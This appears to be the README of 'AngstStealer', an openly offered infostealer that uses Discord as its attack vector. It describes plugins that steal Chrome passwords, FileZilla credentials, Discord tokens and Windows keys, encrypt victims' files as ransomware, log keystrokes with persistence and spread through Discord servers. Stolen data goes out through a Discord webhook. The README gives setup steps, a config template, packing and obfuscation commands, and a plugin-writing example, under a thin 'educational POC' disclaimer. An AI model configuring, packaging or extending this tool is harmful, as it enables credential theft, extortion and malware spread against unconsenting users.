AngstStealer is a POC malware which is designed to highlight and utilize Discord as an attack vector. While it is fully functioning it was created for educational purpose's, please do not use misuse this tool. Angst Stealer currently has a total of 6 plugins:
| Plugin | Description |
|---|---|
| Chrome | The chrome plugin dumps all of the users passwords, websites, and usernames. |
| Filezilla | Checks to see if the user has Filezilla installed, if they do then it dumps stored Filezilla creds. |
| Ransomware | Encrypts all files on the victims computer, drops a note also. |
| Discord | Dumps discord token for Chrome and Discord. |
| Send | Zips and sends all the files through the Discord webhook. |
| User | Drops userdata about the victim such as IP, Username and Computername. |
| Windows | Also drops the windows activation key for the victims computer. |
| Unofficial | Description |
|---|---|
| Post Exploitation | Persistance + keylogger, file dropper included. Author: TheDebianGuy |
| Discord Spreader | Sends itself in all servers the user is in. Author: TheDebianGuy Idea: char#9249 |
- Install python here
- Clone this repo using
git clone https://github.com/backslash/AngstStealeror manually download it. - Run
cd folderpathso that you are inside the directory itself. - Install the required libraries using
pip install -r requirements.txt - Inside the main file you will see a config template, modify it so it matches your requirements.
CONFIG = {
"webhook" : "",
"software": {
"chrome" : True,
"chromecookies": True,
"filezilla": True,
"discord": True,
"screenshot": True,
"windows": True,
"postexploit": True,
"discordspread": True
}
}
webhook -> The discord webhook link which you want it to use.
chrome -> If it should include chrome passwords
filezilla -> Should it include possible saved filezilla passwords
windows -> Give information about your victim & includes the windows key
discord -> Steal discord tokens
screenshot -> takes a screenshot
postexploit -> persistance with keylogger
discordspread -> sends itself in all servers user is in
6. Run one of the following commands listed below, it is worth noting that pyarmor will sometimes corrupt the executable so if you plan on using the pyarmor command you should test it locally to make sure it works.
PYINSTALLER: pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py
PYARMOR: pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py
- Add cookie support (just got lazy and forgot)
- Add more browsers
- Implement some anti-vm tricks.
- Add more plugins
Adding custom plugins is incredibly easy, here is a short example of how you make and integrate your own custom plugin for Angst:
- First off you will want to create your plugin preferably in your plugins folder. The plugin can have as many function as needed, the example I provided below has one function called retrieve_data which will retrieve our sensitive data. Our dump function is needed for proper plugin integration because this is how all the functions know to dump there data.
import requests
class ExamplePlugin(object):
def __init__(self):
self.sensitive_data = ""
def retrieve_data(self):
view_website = requests.get("https://api.ipify.org")
self.sensitve_data = view_website.text
def dump(self):
self.retrieve_data()
return self.sensitive_data
- Next we want to add our example function to our main file which is
angst.pyin ourangst.pydofrom plugins.exampleplugin import ExamplePluginchange your import name on whatever you named your file and whatever you called the plugin class. - Lastly we want to add it to our
config["software"]and theself.pluginsas show below.
"software": {
"chrome" : True,
"chromecookies": True,
"filezilla": True,
"discord": True,
"screenshot": True,
"windows": True,
"postexploit": True,
"discordspread": True
}
self.plugins = {
"chrome": Chrome(),
"chromecookies": Cookies(),
"filezilla": Filezilla(),
"discord": Discord(),
"screenshot": Screenshot(),
"windows": Windows(),
"postexploit": PostExploit()
}
Make sure you use the exact same name when you put it under the config and self.plugins since it is case sensitive.
Use this responsibly, I made this just as a demonstration of a POC. The fact that Discord still hasn't implemented any safegaurds or preventive measures when it comes to something like this is kind've embarrasing. Regardless though, using this without the consent of the computer owner is illegal.